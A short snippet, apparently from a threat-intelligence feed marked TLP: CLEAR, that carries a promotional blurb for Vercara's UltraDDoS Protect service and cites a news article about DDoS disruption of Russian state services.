(TLP: CLEAR) Vercara: Vercara UltraDDoS Protect can detect DDoS attacks and scrub your internet traffic through countermeasures, processes, and practices that are built upon more than 20 years of expertise in thwarting threats, delivered through a carrier-grade global infrastructure that has been engineered to provide the highest standards of availability, reliability, and scale.
Source: https://therecord.media/major-russian-state-services-disrupted-ddos